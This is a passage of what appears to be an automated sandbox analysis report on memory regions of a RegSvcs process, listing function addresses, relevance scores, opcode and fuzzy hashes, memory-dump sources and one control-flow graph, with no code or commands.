                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Co
                                                            • API String ID: 0-3798529171
                                                            • Opcode ID: 307dc14021d586be30dc08a8e10389c37a6f04419b4ce354f048195145ccf61b
                                                            • Instruction ID: fc1c6e747ba64a44a48fbff3182cd8929dc0d04bb0f0b591877e13a4b0ea37f4
                                                            • Opcode Fuzzy Hash: 307dc14021d586be30dc08a8e10389c37a6f04419b4ce354f048195145ccf61b
                                                            • Instruction Fuzzy Hash: C011A331A2020A8BFF175A79C90436A3755FB41294F244A3AF602CB2C7DA64CE804BC9
                                                            Function 012086DF Relevance: .6, Instructions: 582COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1722 12086df-12086e2 1723 12086e4 1722->1723 1724 12086b7-12086d8 1722->1724 1726 1208744-120874f 1723->1726 1727 12086e6-120871f 1723->1727 1728 1208751-1208754 1726->1728 1727->1726 1730 1208781-1208784 1728->1730 1731 1208756-120877c 1728->1731 1732 12087b1-12087b4 1730->1732 1733 1208786-12087ac 1730->1733 1731->1730 1734 12087e1-12087e4 1732->1734 1735 12087b6-12087dc 1732->1735 1733->1732 1737 12087e6-12087f2 1734->1737 1738 12087ff-1208802 1734->1738 1735->1734 1754 12087fa 1737->1754 1740 1208804-120882a 1738->1740 1741 120882f-1208832 1738->1741 1740->1741 1746 1208834-120885a 1741->1746 1747 120885f-1208862 1741->1747 1746->1747 1748 1208864 1747->1748 1749 120886f-1208872 1747->1749 1760 120886a 1748->1760 1756 1208874-120889a 1749->1756 1757 120889f-12088a2 1749->1757 1754->1738 1756->1757 1758 12088a4-12088ca 1757->1758 1759 12088cf-12088d2 1757->1759 1758->1759 1764 12088d4-12088fa 1759->1764 1765 12088ff-1208902 1759->1765 1760->1749 1764->1765 1767 1208904-120892a 1765->1767 1768 120892f-1208932 1765->1768 1767->1768 1772 1208934-120895a 1768->1772 1773 120895f-1208962 1768->1773 1772->1773 1776 1208964-120898a 1773->1776 1777 120898f-1208992 1773->1777 1776->1777 1781 12089a3-12089a6 1777->1781 1782 1208994-1208996 1777->1782 1788 12089d3-12089d6 1781->1788 1789 12089a8-12089ce 1781->1789 1942 1208998 call 1209f90 1782->1942 1943 1208998 call 1209f81 1782->1943 1944 1208998 call 120a033 1782->1944 1791 1208a03-1208a06 1788->1791 1792 12089d8-12089fe 1788->1792 1789->1788 1798 1208a33-1208a36 1791->1798 1799 1208a08-1208a2e 1791->1799 1792->1791 1793 120899e 1793->1781 1801 1208a63-1208a66 1798->1801 1802 1208a38-1208a5e 1798->1802 1799->1798 1807 1208a93-1208a96 1801->1807 1808 1208a68-1208a8e 1801->1808 1802->1801 1809 1208ac3-1208ac6 1807->1809 1810 1208a98-1208abe 1807->1810 1808->1807 1816 1208af3-1208af6 1809->1816 1817 1208ac8-1208aee 1809->1817 1810->1809 1818 1208b23-1208b26 1816->1818 1819 1208af8-1208b1e 1816->1819 1817->1816 1826 1208b53-1208b56 1818->1826 1827 1208b28-1208b4e 1818->1827 1819->1818 1828 1208b73-1208b76 1826->1828 1829 1208b58-1208b6e 1826->1829 1827->1826 1836 1208ba3-1208ba6 1828->1836 1837 1208b78-1208b9e 1828->1837 1829->1828 1838 1208bd3-1208bd6 1836->1838 1839 1208ba8-1208bce 1836->1839 1837->1836 1845 1208c03-1208c06 1838->1845 1846 1208bd8-1208bfe 1838->1846 1839->1838 1848 1208c33-1208c36 1845->1848 1849 1208c08-1208c2e 1845->1849 1846->1845 1855 1208c63-1208c66 1848->1855 1856 1208c38-1208c5e 1848->1856 1849->1848 1858 1208c93-1208c96 1855->1858 1859 1208c68-1208c8e 1855->1859 1856->1855 1864 1208cc3-1208cc6 1858->1864 1865 1208c98-1208cbe 1858->1865 1859->1858 1867 1208cf3-1208cf6 1864->1867 1868 1208cc8-1208cee 1864->1868 1865->1864 1874 1208d23-1208d26 1867->1874 1875 1208cf8-1208d1e 1867->1875 1868->1867 1877 1208d53-1208d56 1874->1877 1878 1208d28-1208d4e 1874->1878 1875->1874 1884 1208d83-1208d86 1877->1884 1885 1208d58-1208d7e 1877->1885 1878->1877 1887 1208db3-1208db6 1884->1887 1888 1208d88-1208dae 1884->1888 1885->1884 1894 1208de3-1208de6 1887->1894 1895 1208db8-1208dde 1887->1895 1888->1887 1897 1208e13-1208e16 1894->1897 1898 1208de8-1208e0e 1894->1898 1895->1894 1904 1208e43-1208e46 1897->1904 1905 1208e18-1208e3e 1897->1905 1898->1897 1907 1208e73-1208e76 1904->1907 1908 1208e48-1208e6e 1904->1908 1905->1904 1914 1208ea3-1208ea6 1907->1914 1915 1208e78-1208e9e 1907->1915 1908->1907 1917 1208ed3-1208ed6 1914->1917 1918 1208ea8-1208ece 1914->1918 1915->1914 1924 1208f03-1208f05 1917->1924 1925 1208ed8-1208efe 1917->1925 1918->1917 1927 1208f07 1924->1927 1928 1208f0c-1208f0f 1924->1928 1925->1924 1927->1928 1928->1728 1934 1208f15-1208f1b 1928->1934 1942->1793 1943->1793 1944->1793
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bbd8387ea848cbb2faeb459fdbfcea275a2ae6afcd40edd185817dd333c79175
                                                            • Instruction ID: b43893a4e9a6c8588ec3347ab7d09c97c57b7cd3a3ee417dc8106b1910057ed6
                                                            • Opcode Fuzzy Hash: bbd8387ea848cbb2faeb459fdbfcea275a2ae6afcd40edd185817dd333c79175
                                                            • Instruction Fuzzy Hash: F0227F35F50202CBDB1AAB3CE49532A37A2FBC6354B504A2CD205CB796CF79DC568B85
                                                            Function 01208728 Relevance: .6, Instructions: 558COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca1f9ee9d053a9125d09ad13373f3a36b462965bb07c86990fad8127b1d1773a
                                                            • Instruction ID: 6c42b37fef0246a527c719d5e7f3280627e4a32da298b40c3d4ef355d5c35a63
                                                            • Opcode Fuzzy Hash: ca1f9ee9d053a9125d09ad13373f3a36b462965bb07c86990fad8127b1d1773a
                                                            • Instruction Fuzzy Hash: 7A126F34F50202CBDB1AAB3CE49432A37A2FBC6355B504A2CD205CB796DF79DC568B85
                                                            Function 012A1EF8 Relevance: .4, Instructions: 408COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cff356281d4c8817d8fc649898ea3c10b56ec3589cae8c561e0605a131cf5b8a
                                                            • Instruction ID: 176b77711fd0800c8ac2ebe251070dd3a0379b1bb18a53d743d499edd9460d83
                                                            • Opcode Fuzzy Hash: cff356281d4c8817d8fc649898ea3c10b56ec3589cae8c561e0605a131cf5b8a
                                                            • Instruction Fuzzy Hash: E341A031D1070ADFDB04DFA8C89469DFBB1FF89300F14C569D645AB265EB70A981CB90
                                                            Function 0120A20F Relevance: .4, Instructions: 391COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a0ea1b0369d2969a0d9a19a5eea94d66b0fa1db037ef060061c18bf89432c53b
                                                            • Instruction ID: 302095ba7177e4e0a7ffd12d0cb69d630a96b146b7edab225aceaae9aba0b884
                                                            • Opcode Fuzzy Hash: a0ea1b0369d2969a0d9a19a5eea94d66b0fa1db037ef060061c18bf89432c53b
                                                            • Instruction Fuzzy Hash: E2E1C135B102068FDB16DF68D594A6DBBB2FF88310F604629E906D7396DB35EC42CB90
                                                            Function 012A2150 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dbe1f59bdcb309bc4d4583f70c6b69b217427bbbce1d841358b9e7007fcaf6ad
                                                            • Instruction ID: 7ab9d965b9ab99a9f0e9f94030f986c00ed68c00ef7fbfa0eaf0a263b8ca78bd
                                                            • Opcode Fuzzy Hash: dbe1f59bdcb309bc4d4583f70c6b69b217427bbbce1d841358b9e7007fcaf6ad
                                                            • Instruction Fuzzy Hash: C7D18A70E10309CFDB18DFA9C9546AEBBF2FF88310F548569E505AB291DB70AD41CBA0
                                                            Function 01204A7E Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 745457ab1659d918680f704f5a91b09351c3599c47c6f53a173bef5f7cfd64ea
                                                            • Instruction ID: 2c203cfb9558d00084705101fd58881be5dd56a0d78ab93f91f7c93e820ec3ba
                                                            • Opcode Fuzzy Hash: 745457ab1659d918680f704f5a91b09351c3599c47c6f53a173bef5f7cfd64ea
                                                            • Instruction Fuzzy Hash: F5A18F70E2064ACFDB11DFA9C88179DBBF2BF88714F14C229DA14E7295EB749845CB81
                                                            Function 0120DD82 Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f0f25cf1eb432255dfa01b2560fe1941a29f4f5e65b9942e9f60e871aec70f3c
                                                            • Instruction ID: b94b8ebd5e6b9eacc0aeeffa7cbc25a5d54c1e45fa775e4581944c53dc7d99a0
                                                            • Opcode Fuzzy Hash: f0f25cf1eb432255dfa01b2560fe1941a29f4f5e65b9942e9f60e871aec70f3c
                                                            • Instruction Fuzzy Hash: 025170717112069FDB16CFA8C880B7AB7A6FF84310F248659E515DB2DACB31EC82C791
                                                            Function 01206ED2 Relevance: .2, Instructions: 171COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52338c9356f9b991bcc10a74b7abe93b7af72b80e52a350848012c73d3132840
                                                            • Instruction ID: e5cb018c3a230f2217fb104297e00c684209b07ac13d6f97a7265d345506f391
                                                            • Opcode Fuzzy Hash: 52338c9356f9b991bcc10a74b7abe93b7af72b80e52a350848012c73d3132840
                                                            • Instruction Fuzzy Hash: BB518B34B20115CFDB15DB68C458AAE7BB6BF89700F200669E506DB3A2DB75AC40CBA1
                                                            Function 0120A6C8 Relevance: .1, Instructions: 137COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12491665be8def1d72811909d59279e61b3b06149853bdb552654e2fca4a70c1
                                                            • Instruction ID: 38833d02dd6d2569b28720afd0ba1810a13402ac70d29eb0102c4efc83f223d4
                                                            • Opcode Fuzzy Hash: 12491665be8def1d72811909d59279e61b3b06149853bdb552654e2fca4a70c1
                                                            • Instruction Fuzzy Hash: C9514B75A00205CFDB05DF69E88479DFBB1FF88310F54C2AAE9099B396E770A945CB90
                                                            Function 01206CD4 Relevance: .1, Instructions: 134COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 79364ba2edbc59919e3b14f4fc7811123af384f0f7b06da48838391df7a4580c
                                                            • Instruction ID: 75762220213c92c5d6bc33c9e9a9862dda25083c7302d9cededaa353374bfbca
                                                            • Opcode Fuzzy Hash: 79364ba2edbc59919e3b14f4fc7811123af384f0f7b06da48838391df7a4580c
                                                            • Instruction Fuzzy Hash: 98511470D202198FDB15CFA9C885B9DBBF1BF48710F148219E915BB392D774A844CF94
                                                            Function 01206CE0 Relevance: .1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a4d7fdc211f63a358c28789a12d60f313d7f13cf803709786b97393eeece2fb
                                                            • Instruction ID: 4e50523078f5e8e1ee18b0163aa964b84a4fb8302c415364374a7ed217075e45
                                                            • Opcode Fuzzy Hash: 3a4d7fdc211f63a358c28789a12d60f313d7f13cf803709786b97393eeece2fb
                                                            • Instruction Fuzzy Hash: 0C511470D202198FDB19CFA9C884B9DBBF1BF48310F14822AE915BB392D774A844CF95
                                                            Function 0120112A Relevance: .1, Instructions: 117COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3de559b2716b4c7ba32a922070017bd73f51e54c1e9d63bceddaa8d67eed7235
                                                            • Instruction ID: 3aeeb9e33019a1c1a8862b75a2cb883fdb9d47b9239a6537e31ffeb915957e98
                                                            • Opcode Fuzzy Hash: 3de559b2716b4c7ba32a922070017bd73f51e54c1e9d63bceddaa8d67eed7235
                                                            • Instruction Fuzzy Hash: 61512732A05282CFC71AEF28F9C09983FB1FB95305710A97DD1515B3AEEA606D45CB82
                                                            Function 01201138 Relevance: .1, Instructions: 109COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96503c8d6ad897e81c194d2cec6a3d70fa823dbbfc99cbf3a01d03eefb1bae7d
                                                            • Instruction ID: dcfb9f61e65ffcf12738205821c450a46b788a1d3749cccf3bd7f9b9985a4c81
                                                            • Opcode Fuzzy Hash: 96503c8d6ad897e81c194d2cec6a3d70fa823dbbfc99cbf3a01d03eefb1bae7d
                                                            • Instruction Fuzzy Hash: CE51E632A05282CFC71AFF28F9809593FB1FB95305310A97DD1555B3AEEA706D45CB82
                                                            Function 012A2998 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26260f113584fd57fd46a1a1dc9575fd182e1a2e3ee49733cd1507431dc0e001
                                                            • Instruction ID: a5e83c1e5d8201a12f6e69fb42c307a0d1a2c399cd39cbfa7f7009bcd8993a45
                                                            • Opcode Fuzzy Hash: 26260f113584fd57fd46a1a1dc9575fd182e1a2e3ee49733cd1507431dc0e001
                                                            • Instruction Fuzzy Hash: 9231AD71B002078FDB15EB78D890AAEBBB1EF89310F504569D506EB352DB75AC06CB90
                                                            Function 01202834 Relevance: .1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 44784bcc4250eccd9ed5e965a61fe8dec3a3442063a5ce7b4f9aba864156fcc7
                                                            • Instruction ID: 2c8d7719b81131d415b129522a6d201f2d7a9e11dffb47a60d41258c314be5f9
                                                            • Opcode Fuzzy Hash: 44784bcc4250eccd9ed5e965a61fe8dec3a3442063a5ce7b4f9aba864156fcc7
                                                            • Instruction Fuzzy Hash: A74154B0C1020DDFEB10CF99C988B9EBFB0BF48300F20852AE505AB294DB706945CF91
                                                            Function 01207D90 Relevance: .1, Instructions: 99COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 684191340561d57bed69cb158218faf83deb42965de3847ca0d2be71f2729bfa
                                                            • Instruction ID: 98fd2790990fd69ecb3ae54d38e2d6ce117a37b6f8f8b27e374b9ab4bb6c8087
                                                            • Opcode Fuzzy Hash: 684191340561d57bed69cb158218faf83deb42965de3847ca0d2be71f2729bfa
                                                            • Instruction Fuzzy Hash: 37318331E2121ADBEB16CF68C4457AEB7B2FF85310F108A29E541E7292D7B0BD41CB50
                                                            Function 012A29A8 Relevance: .1, Instructions: 94COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4553a1fcb0751b9c0c75a41503a4bde13d0b9901cf206d6ecf5dd0d2c79c4940
                                                            • Instruction ID: 60ac3f9f8071f3e14473df11818bc16653a591bfe31ec7d65da43c950a3fcc2c
                                                            • Opcode Fuzzy Hash: 4553a1fcb0751b9c0c75a41503a4bde13d0b9901cf206d6ecf5dd0d2c79c4940
                                                            • Instruction Fuzzy Hash: 5C318F71B002068FDB15EB78D890AAEBBB5EF88300F508528D506E7355DB75ED05CB90
                                                            Function 01207D80 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6a12afacecc7c9aaa1b65203fc22ad1056c1ef21ba3f6a53d344999fbc70cc2
                                                            • Instruction ID: 0d71f0da7173ead402e786a1783e23b46fa8e3edcb48ce234d02b4280cc83b8e
                                                            • Opcode Fuzzy Hash: b6a12afacecc7c9aaa1b65203fc22ad1056c1ef21ba3f6a53d344999fbc70cc2
                                                            • Instruction Fuzzy Hash: 1F314431E2121ADBDB16CF69C4557AEB7B2FF45300F208629E541F7292DB71AD41CB50
                                                            Function 012026CE Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cadfea80143e094ef23d19d08c956da92e6cdf5762ddd0ef99a4446608624d38
                                                            • Instruction ID: b7fa20931418065cefa73ec3d2be2a1e6cc396ca79a280fa8eef4e19a36eb0c2
                                                            • Opcode Fuzzy Hash: cadfea80143e094ef23d19d08c956da92e6cdf5762ddd0ef99a4446608624d38
                                                            • Instruction Fuzzy Hash: 8E41FEB0D00349DFEB14CFA9C984A9EBFB5FF48310F10812AE909AB254DB75A945CB90
                                                            Function 012026D8 Relevance: .1, Instructions: 90COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dfaa0dca6a146a38f9d679414e15c253c3e4c965eccfbbf8676163381e01c9f4
                                                            • Instruction ID: fc9978e48383f5588dbcbbe6cd80ea04b83e30e8b5788cc01a3a6f19480fb941
                                                            • Opcode Fuzzy Hash: dfaa0dca6a146a38f9d679414e15c253c3e4c965eccfbbf8676163381e01c9f4
                                                            • Instruction Fuzzy Hash: E741EFB0D00349DFDB14CFA9C984A9EBFF5FF48310F10812AE909AB254DB75A945CB90
                                                            Function 01205089 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8de9f3cf9a85ac856a9e0dd6cd73cd685cf9b6ae305bef8d803ec7a1a3553589
                                                            • Instruction ID: a925048b109a827514eb52360a12d3150ba3785b23b5fa6dea3835f4cf69c531
                                                            • Opcode Fuzzy Hash: 8de9f3cf9a85ac856a9e0dd6cd73cd685cf9b6ae305bef8d803ec7a1a3553589
                                                            • Instruction Fuzzy Hash: 31316931B10256CFDB26EB78C5546ADB7F6AF48300F100A68D601EB396DB36CC41CB91
                                                            Function 01205098 Relevance: .1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dc96e2d0265706c78234c559adfed14aa64fa4225587a50437b25fea7d3b7ad4
                                                            • Instruction ID: 8bd4c52bb9d9586d019973c0ea0b29dec30f8c12e628ad2f97fcf735e09ee239
                                                            • Opcode Fuzzy Hash: dc96e2d0265706c78234c559adfed14aa64fa4225587a50437b25fea7d3b7ad4
                                                            • Instruction Fuzzy Hash: 3E314C34B10256CFDB26EB78C5546AE77F6AF88344F100A68D641EB396DB36DC01CB91
                                                            Function 0120A080 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ebe0868858d3fb8eaaabdfd143dd92f3d7ea4e09897b6ba884d67c9dd921aa0
                                                            • Instruction ID: 7b04b0a2127f326eb06e33528bbb6a96e083bd25331d142ea35b0c0b66f06427
                                                            • Opcode Fuzzy Hash: 6ebe0868858d3fb8eaaabdfd143dd92f3d7ea4e09897b6ba884d67c9dd921aa0
                                                            • Instruction Fuzzy Hash: 7B319375E1030A9BDB06CFA8D99069EF7B2BF89304F50C619E905FB385DB709846CB90
                                                            Function 0120A090 Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 85eda28665243540c89c6df79c1c37dbea14589653b98a94605df63ddfb8b034
                                                            • Instruction ID: c1d28e9e5044c63d341ada931dc138c2065aa6ee1357163f2fffc7bacb4428fe
                                                            • Opcode Fuzzy Hash: 85eda28665243540c89c6df79c1c37dbea14589653b98a94605df63ddfb8b034
                                                            • Instruction Fuzzy Hash: 16215E31A1020A9BDB16CF68D99069EFBB2FF89340F50C619E905EB385DB719846CB90
                                                            Function 01201690 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f290e2224fbf53906b309cae8254b69b7cb3f568571a58ba1de4bc3bbaf549bc
                                                            • Instruction ID: 899b668f7dff09f12dd0eced886c29dc0be3b993d5ee05e3f2447e08883ef034
                                                            • Opcode Fuzzy Hash: f290e2224fbf53906b309cae8254b69b7cb3f568571a58ba1de4bc3bbaf549bc
                                                            • Instruction Fuzzy Hash: E021833AA601028FEB27E72CED84B193765EB85314F105B29D106C73A7EB78DC958B91
                                                            Function 0120136F Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 74000f880c3e6b9c640db29eb6626d2ee2e96d8b9f01ab3ea7faa7ec1da9ec65
                                                            • Instruction ID: d67cf341760d19413f99523fcad59b088c0c00757749a1309629292d5476db7b
                                                            • Opcode Fuzzy Hash: 74000f880c3e6b9c640db29eb6626d2ee2e96d8b9f01ab3ea7faa7ec1da9ec65
                                                            • Instruction Fuzzy Hash: 3D21AF71B202028BFB375768E49A32D3B51FB43315F510B29E606CB7D3DA69DCA58742
                                                            Function 0120A860 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 91d45ec6e253d194a2f7a328d306f69d31ef339f10a95b7ea54f42b7acc0426e
